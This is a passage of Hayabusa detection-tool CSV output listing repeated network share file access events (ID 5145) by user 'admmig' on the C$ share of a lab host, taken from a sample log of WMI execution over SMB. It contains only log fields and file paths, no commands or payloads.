Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 